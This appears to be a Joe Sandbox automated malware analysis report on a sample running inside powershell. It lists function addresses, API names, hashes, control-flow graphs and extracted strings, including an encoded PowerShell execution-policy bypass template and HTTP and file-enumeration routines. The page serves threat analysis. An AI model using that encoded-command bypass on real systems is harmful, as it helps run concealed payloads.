                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                    • String ID: $@
                                                    • API String ID: 3318157856-1077428164
                                                    • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                                                    • Instruction ID: c879a5fc215cf7d9df5593d13273af5666b518eaad1d7d80c893318b3729fdd5
                                                    • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                                                    • Instruction Fuzzy Hash: DF52D063608684A6FF658E95B74C36EEBA0B749794F161105DA461EFF8DF3CC840EB02
                                                    Function 0000022EFA0D2528 Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                    • String ID:
                                                    • API String ID: 3318157856-3916222277
                                                    • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                                                    • Instruction ID: 8bb7cd7269f5435c1d3f87f4262a6a6b68eccd93a1a244ab569c9d4302a02333
                                                    • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                                                    • Instruction Fuzzy Hash: 3152DE33608686A6FF658E94B7483AE6BA4B74D794F261005DA461FFF5DF7CC840AB00
                                                    Function 0000022EF9B3239C Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 694COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                    • String ID: $@
                                                    • API String ID: 3318157856-1077428164
                                                    • Opcode ID: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                                                    • Instruction ID: ff49ecf7092227870cad29336f63db43e7eaa423e166d2def8b7610ed3d097c7
                                                    • Opcode Fuzzy Hash: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                                                    • Instruction Fuzzy Hash: FD52F322708684A6FF75CB95D76CB6E7BA0BB65784F164105DEC607EE4DB38C840EB08
                                                    Function 0000022EF9B31928 Relevance: 28.6, APIs: 14, Strings: 2, Instructions: 645COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                                                    • String ID: -$0
                                                    • API String ID: 3246410048-417717675
                                                    • Opcode ID: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                                                    • Instruction ID: 074ed1d1f12d8d1cc4758e7cca6151a4dde977d87e02543c6598768d7250f553
                                                    • Opcode Fuzzy Hash: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                                                    • Instruction Fuzzy Hash: EE420362708A94A6FF74CBD5D76CB7E6BA8B761780F160005DEC606ED4DB39D840EB08
                                                    Function 0000022EF9B35914 Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 460COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2399 22ef9b35914-22ef9b3595c call 22ef9b2fec0 2402 22ef9b3595e-22ef9b35960 2399->2402 2403 22ef9b35965-22ef9b35968 2399->2403 2404 22ef9b36026-22ef9b3604f call 22ef9b37220 2402->2404 2405 22ef9b35989-22ef9b359bb 2403->2405 2406 22ef9b3596a-22ef9b35984 call 22ef9b310a8 call 22ef9b31118 call 22ef9b31740 2403->2406 2408 22ef9b359c6-22ef9b359cc 2405->2408 2409 22ef9b359bd-22ef9b359c4 2405->2409 2406->2404 2412 22ef9b359ce-22ef9b359d6 call 22ef9b370ec 2408->2412 2413 22ef9b359db-22ef9b359e4 call 22ef9b38dbc 2408->2413 2409->2406 2409->2408 2412->2413 2420 22ef9b35ca6-22ef9b35cb7 2413->2420 2421 22ef9b359ea-22ef9b359fb 2413->2421 2425 22ef9b35f88-22ef9b35fa4 call 22ef9b41700 2420->2425 2426 22ef9b35cbd-22ef9b35cc9 2420->2426 2421->2420 2423 22ef9b35a01-22ef9b35a35 call 22ef9b34c44 call 22ef9b41808 2421->2423 2423->2420 2458 22ef9b35a3b-22ef9b35a3d 2423->2458 2437 22ef9b35fae-22ef9b35fb4 call 22ef9b41728 2425->2437 2438 22ef9b35fa6-22ef9b35fac 2425->2438 2428 22ef9b35ccf-22ef9b35cd2 2426->2428 2429 22ef9b35d97-22ef9b35d9b 2426->2429 2434 22ef9b35cd8 2428->2434 2435 22ef9b35fe6-22ef9b35ffc 2428->2435 2432 22ef9b35da1-22ef9b35da4 2429->2432 2433 22ef9b35e76-22ef9b35e79 2429->2433 2432->2435 2443 22ef9b35daa 2432->2443 2433->2435 2442 22ef9b35e7f 2433->2442 2444 22ef9b35cdb-22ef9b35ce6 2434->2444 2439 22ef9b35ffe-22ef9b36002 2435->2439 2440 22ef9b36008-22ef9b36018 call 22ef9b31118 call 22ef9b310a8 2435->2440 2445 22ef9b35fb6-22ef9b35fb8 2437->2445 2438->2445 2439->2402 2439->2440 2455 22ef9b36020-22ef9b36024 2440->2455 2449 22ef9b35e85-22ef9b35e8a 2442->2449 2450 22ef9b35daf-22ef9b35dba 2443->2450 2451 22ef9b35ce8-22ef9b35cf1 2444->2451 2445->2455 2456 22ef9b35fba-22ef9b35fbc 2445->2456 2459 22ef9b35e8c-22ef9b35e95 2449->2459 2460 22ef9b35dbc-22ef9b35dc5 2450->2460 2452 22ef9b35cf3-22ef9b35cfc 2451->2452 2453 22ef9b35d19-22ef9b35d5c call 22ef9b41700 2451->2453 2461 22ef9b35cfe-22ef9b35d05 2452->2461 2462 22ef9b35d08-22ef9b35d17 2452->2462 2453->2437 2485 22ef9b35d62-22ef9b35d78 2453->2485 2455->2404 2456->2435 2464 22ef9b35fbe-22ef9b35fc1 2456->2464 2466 22ef9b35a3f-22ef9b35a42 2458->2466 2467 22ef9b35a48-22ef9b35a5c call 22ef9b41810 2458->2467 2468 22ef9b35e97-22ef9b35ea4 2459->2468 2469 22ef9b35ec6-22ef9b35f0f call 22ef9b41818 2459->2469 2470 22ef9b35df8-22ef9b35e3b call 22ef9b41700 2460->2470 2471 22ef9b35dc7-22ef9b35dd4 2460->2471 2461->2462 2462->2451 2462->2453 2474 22ef9b35fc3-22ef9b35fd3 call 22ef9b31118 call 22ef9b310a8 2464->2474 2475 22ef9b35fda-22ef9b35fe1 call 22ef9b310c8 2464->2475 2466->2420 2466->2467 2493 22ef9b35a62-22ef9b35a65 2467->2493 2494 22ef9b35c9d-22ef9b35ca1 2467->2494 2478 22ef9b35eb2-22ef9b35ec4 2468->2478 2479 22ef9b35ea6-22ef9b35eae 2468->2479 2469->2437 2489 22ef9b35f15 2469->2489 2470->2437 2490 22ef9b35e41-22ef9b35e57 2470->2490 2481 22ef9b35de4-22ef9b35df6 2471->2481 2482 22ef9b35dd6-22ef9b35de0 2471->2482 2474->2475 2475->2435 2478->2459 2478->2469 2479->2478 2481->2460 2481->2470 2482->2481 2485->2445 2491 22ef9b35d7e-22ef9b35d8c 2485->2491 2496 22ef9b35f17-22ef9b35f51 call 22ef9b41700 2489->2496 2490->2445 2497 22ef9b35e5d-22ef9b35e6b 2490->2497 2491->2444 2498 22ef9b35d92 2491->2498 2500 22ef9b35bef-22ef9b35bf4 2493->2500 2501 22ef9b35a6b-22ef9b35a8a 2493->2501 2494->2456 2514 22ef9b35f61-22ef9b35f69 call 22ef9b41728 2496->2514 2515 22ef9b35f53-22ef9b35f5d 2496->2515 2497->2450 2503 22ef9b35e71 2497->2503 2498->2445 2504 22ef9b35c14 2500->2504 2505 22ef9b35bf6-22ef9b35c12 2500->2505 2507 22ef9b35aac-22ef9b35ab6 call 22ef9b37b38 2501->2507 2508 22ef9b35a8c-22ef9b35aaa 2501->2508 2503->2445 2511 22ef9b35c19-22ef9b35c1e 2504->2511 2505->2511 2519 22ef9b35ab8-22ef9b35ac5 2507->2519 2520 22ef9b35aec-22ef9b35af2 2507->2520 2512 22ef9b35af5-22ef9b35b02 call 22ef9b3a1ec 2508->2512 2517 22ef9b35c20-22ef9b35c2f call 22ef9b3a1f4 2511->2517 2518 22ef9b35c5f 2511->2518 2529 22ef9b35c94-22ef9b35c98 2512->2529 2532 22ef9b35b08-22ef9b35b45 call 22ef9b41818 2512->2532 2530 22ef9b35f6d-22ef9b35f6f 2514->2530 2515->2496 2522 22ef9b35f5f 2515->2522 2517->2437 2537 22ef9b35c35-22ef9b35c3b 2517->2537 2521 22ef9b35c64-22ef9b35c6c 2518->2521 2526 22ef9b35c73-22ef9b35c8b 2519->2526 2527 22ef9b35acb-22ef9b35ae1 call 22ef9b3a1ec 2519->2527 2520->2512 2528 22ef9b35c6e 2521->2528 2521->2529 2522->2530 2526->2529 2527->2529 2543 22ef9b35ae7-22ef9b35aea 2527->2543 2528->2493 2529->2445 2530->2445 2535 22ef9b35f71-22ef9b35f80 2530->2535 2532->2529 2544 22ef9b35b4b-22ef9b35b7a call 22ef9b41700 2532->2544 2535->2449 2540 22ef9b35f86 2535->2540 2537->2518 2538 22ef9b35c3d-22ef9b35c53 call 22ef9b3a1f4 2537->2538 2538->2437 2548 22ef9b35c59-22ef9b35c5b 2538->2548 2540->2445 2543->2532 2544->2437 2549 22ef9b35b80-22ef9b35b8e 2544->2549 2548->2518 2549->2529 2550 22ef9b35b94-22ef9b35b9e 2549->2550 2550->2521 2551 22ef9b35ba4-22ef9b35bd6 call 22ef9b41700 2550->2551 2551->2437 2554 22ef9b35bdc-22ef9b35be1 2551->2554 2554->2529 2555 22ef9b35be7-22ef9b35bed 2554->2555 2555->2521
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                    • String ID: U
                                                    • API String ID: 3902385426-4171548499
                                                    • Opcode ID: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                                                    • Instruction ID: 769a17ffd5e4cc9a8da3852ef1351304eb9bd3c732eaee80aeb11cea0f8dad71
                                                    • Opcode Fuzzy Hash: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                                                    • Instruction Fuzzy Hash: CA120832318641A6EF30CFA8D5AC79E77A0F7A4758F520116DACD43E94DB7AC445EB08
                                                    Function 0000022EFA0C7B38 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2556 22efa0c7b38-22efa0c7bad call 22efa0cf530 call 22efa0cb454 call 22efa0c6104 2563 22efa0c7bb1-22efa0c7bbf call 22efa0c6114 2556->2563 2566 22efa0c7f4a-22efa0c7f4d 2563->2566 2567 22efa0c7bc5 2563->2567 2570 22efa0c8218-22efa0c8250 call 22efa0cf530 call 22efa0c6284 2566->2570 2571 22efa0c7f53-22efa0c7f55 2566->2571 2568 22efa0c7bcb-22efa0c7bcd 2567->2568 2569 22efa0c7f29 2567->2569 2573 22efa0c7bd3-22efa0c7bd5 2568->2573 2574 22efa0c82f5-22efa0c82f8 2568->2574 2572 22efa0c7f2b-22efa0c7f3d call 22efa0c0de0 2569->2572 2618 22efa0c8252-22efa0c8263 call 22efa0cf63c 2570->2618 2619 22efa0c8265-22efa0c8276 call 22efa0cf63c 2570->2619 2575 22efa0c7f5b-22efa0c7f5d 2571->2575 2576 22efa0c8162-22efa0c81bb call 22efa0cf530 call 22efa0c6284 call 22efa0cf63c 2571->2576 2587 22efa0c7f42-22efa0c7f45 2572->2587 2579 22efa0c7bdb-22efa0c7bdd 2573->2579 2580 22efa0c7ed6-22efa0c7f16 call 22efa0cf530 call 22efa0c6284 call 22efa0cf920 2573->2580 2584 22efa0c83a3-22efa0c83c3 2574->2584 2585 22efa0c82fe-22efa0c8301 2574->2585 2581 22efa0c815b-22efa0c815d 2575->2581 2582 22efa0c7f63-22efa0c7f65 2575->2582 2626 22efa0c82e5 2576->2626 2663 22efa0c81c1-22efa0c81c4 2576->2663 2588 22efa0c7e4b-22efa0c7e8b call 22efa0cf530 call 22efa0c6284 call 22efa0cf920 2579->2588 2589 22efa0c7be3-22efa0c7be5 2579->2589 2677 22efa0c7f19-22efa0c7f20 2580->2677 2581->2572 2591 22efa0c80cb-22efa0c80fe call 22efa0cf63c 2582->2591 2592 22efa0c7f6b-22efa0c7f6d 2582->2592 2585->2584 2594 22efa0c8307-22efa0c830f 2585->2594 2597 22efa0c80b4-22efa0c80c6 call 22efa0cf530 2587->2597 2681 22efa0c7e8e-22efa0c7e95 2588->2681 2600 22efa0c7beb-22efa0c7bed 2589->2600 2601 22efa0c7e0e-22efa0c7e2b call 22efa0b1258 2589->2601 2625 22efa0c8104-22efa0c8107 2591->2625 2591->2626 2603 22efa0c808c-22efa0c80a9 call 22efa0c0d04 2592->2603 2604 22efa0c7f73-22efa0c7f76 2592->2604 2594->2594 2606 22efa0c8311-22efa0c8314 2594->2606 2613 22efa0c7df6-22efa0c7e09 call 22efa0cf920 2600->2613 2614 22efa0c7bf3-22efa0c7bf5 2600->2614 2601->2584 2640 22efa0c7e31-22efa0c7e49 call 22efa0cf530 2601->2640 2603->2584 2639 22efa0c80af 2603->2639 2616 22efa0c7f7c-22efa0c7f7e 2604->2616 2617 22efa0c8074-22efa0c8087 call 22efa0c0eac 2604->2617 2606->2584 2620 22efa0c831a-22efa0c8349 call 22efa0cf63c 2606->2620 2613->2563 2631 22efa0c7bfb-22efa0c7bfd 2614->2631 2632 22efa0c7d17-22efa0c7d53 call 22efa0cf530 call 22efa0c6284 2614->2632 2616->2563 2628 22efa0c7f84-22efa0c7fac call 22efa0cf530 call 22efa0c6284 2616->2628 2617->2587 2638 22efa0c827b-22efa0c828c 2618->2638 2619->2638 2660 22efa0c839b-22efa0c839e call 22efa0cf920 2620->2660 2661 22efa0c834b 2620->2661 2642 22efa0c810d-22efa0c8154 2625->2642 2641 22efa0c82eb-22efa0c82f0 call 22efa0cf920 2626->2641 2690 22efa0c7fe5-22efa0c8002 call 22efa0cf63c 2628->2690 2691 22efa0c7fae 2628->2691 2648 22efa0c7c58-22efa0c7cba call 22efa0cf530 call 22efa0c6284 call 22efa0cf63c 2631->2648 2649 22efa0c7bff-22efa0c7c01 2631->2649 2692 22efa0c7d6d-22efa0c7d83 call 22efa0cf63c 2632->2692 2693 22efa0c7d55-22efa0c7d6b call 22efa0cf63c 2632->2693 2638->2626 2653 22efa0c828e-22efa0c8291 2638->2653 2639->2597 2679 22efa0c7ec9-22efa0c7ed1 2640->2679 2641->2563 2642->2642 2657 22efa0c8156 2642->2657 2648->2626 2713 22efa0c7cc0-22efa0c7cc3 2648->2713 2649->2563 2664 22efa0c7c03-22efa0c7c13 call 22efa0c6114 2649->2664 2666 22efa0c8297-22efa0c82de 2653->2666 2657->2563 2660->2584 2672 22efa0c8350-22efa0c8397 2661->2672 2675 22efa0c81ca-22efa0c8211 2663->2675 2694 22efa0c7c2d-22efa0c7c30 2664->2694 2695 22efa0c7c15-22efa0c7c2b call 22efa0cf920 2664->2695 2666->2666 2678 22efa0c82e0 2666->2678 2672->2672 2683 22efa0c8399 2672->2683 2675->2675 2685 22efa0c8213 2675->2685 2677->2677 2687 22efa0c7f22-22efa0c7f24 2677->2687 2678->2563 2679->2641 2681->2681 2689 22efa0c7e97-22efa0c7ea9 call 22efa0cf920 2681->2689 2683->2584 2685->2563 2687->2563 2714 22efa0c7eac-22efa0c7eb3 2689->2714 2710 22efa0c8007-22efa0c8017 2690->2710 2700 22efa0c7fb1-22efa0c7fb9 2691->2700 2711 22efa0c7d88-22efa0c7d99 2692->2711 2693->2711 2694->2563 2697 22efa0c7c36-22efa0c7c53 call 22efa0cf920 2694->2697 2695->2563 2697->2563 2700->2700 2708 22efa0c7fbb-22efa0c7fbe 2700->2708 2708->2690 2715 22efa0c7fc0-22efa0c7fe3 call 22efa0cf63c 2708->2715 2710->2626 2716 22efa0c801d-22efa0c8020 2710->2716 2711->2626 2717 22efa0c7d9f-22efa0c7da2 2711->2717 2718 22efa0c7cc9-22efa0c7d10 2713->2718 2714->2714 2719 22efa0c7eb5-22efa0c7ec6 call 22efa0cf530 2714->2719 2715->2710 2721 22efa0c8026-22efa0c806d 2716->2721 2722 22efa0c7da8-22efa0c7def 2717->2722 2718->2718 2723 22efa0c7d12 2718->2723 2719->2679 2721->2721 2726 22efa0c806f 2721->2726 2722->2722 2727 22efa0c7df1 2722->2727 2723->2563 2726->2563 2727->2563
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                    • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                                                    • API String ID: 3442832105-1222817042
                                                    • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                                                    • Instruction ID: 448c598577a7d517654325d1462a37e202ee1a50cf5d25115a5d6ccde123e6e7
                                                    • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                                                    • Instruction Fuzzy Hash: 9D42C762614E84A2EE258B69F1453E8A3B0FF9C799F055101DF891BF71EB3CD1A6E340
                                                    Function 0000022EFA0C1C30 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                                                    • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                                                    • API String ID: 723279517-1754256099
                                                    • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                                                    • Instruction ID: e15ee332dafd4a51bf167758841f31a1f73406edc933e7fa286befec57257806
                                                    • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                                                    • Instruction Fuzzy Hash: 0B61B072304751A6EF14DBA1F59829DA3A1F78CB80F414015EE494BFA9EF7CC605EB40
                                                    Function 0000022EFA0BE68C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 165networkfileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                                                    • String ID: %s%s$*/*
                                                    • API String ID: 3536628738-856325523
                                                    • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                                                    • Instruction ID: 25c28d18f78e98b7ecba82cf1f25bf0136018bbeae2abe28f452bc7835139b49
                                                    • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                                                    • Instruction Fuzzy Hash: 01719122700B81A6EF109BA1F6987AA67A1F78CBD4F420112EE4D5BFA5DF3CC505E700
                                                    Function 0000022EF9B26F38 Relevance: 18.5, APIs: 10, Strings: 2, Instructions: 545COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                    • String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
                                                    • API String ID: 3442832105-3652497171
                                                    • Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                                                    • Instruction ID: 0233bbdf85a01739512684917093ddba419a92e3e8cd302048d752628e7d0e42
                                                    • Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                                                    • Instruction Fuzzy Hash: BD42D561614E84A2EF378B69D1553E8A3A0FFA9759F015101DFC817F65EF38D2A2D308
                                                    Function 0000022EFA0C0F34 Relevance: 18.2, APIs: 12, Instructions: 163processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                                                    • String ID:
                                                    • API String ID: 3044875250-0
                                                    • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                                                    • Instruction ID: faf235a36a2fec85977fc8bb3a4553c3029e4125144d56694c43528b04ef1748
                                                    • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                                                    • Instruction Fuzzy Hash: 1C717B32204B44E2EF209FA1F68835E63A1FB4CB84F124125DA494BFA5DF7CC495EB40
                                                    Function 0000022EFA0C9220 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                                                    • String ID: %s\*
                                                    • API String ID: 2620626937-766152087
                                                    • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                                                    • Instruction ID: 7af96dcc26320755320cbb0669f069870832c86b2448089441905ac21959ef2e
                                                    • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                                                    • Instruction Fuzzy Hash: 5C31ED1620068266EE159BE3BA183A97B61734EFD0F8A50519ED50FFF6DB3CC942B300
                                                    Function 0000022EFA0C5E28 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
